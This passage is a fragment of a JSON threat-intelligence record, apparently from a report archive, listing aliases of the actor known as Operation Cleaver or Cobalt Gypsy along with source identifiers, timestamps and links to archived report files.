"G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434385, "ts_updated_at": 1775826679, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d889f8ed2f6a73de74d4c8ec846a60281b64c951.pdf", "text": "https://archive.orkl.eu/d889f8ed2f6a73de74d4c8ec846a60281b64c951.txt", "img": "https://archive.orkl.eu/d889f8ed2f6a73de74d4c8ec846a60281b64c951.jpg" } }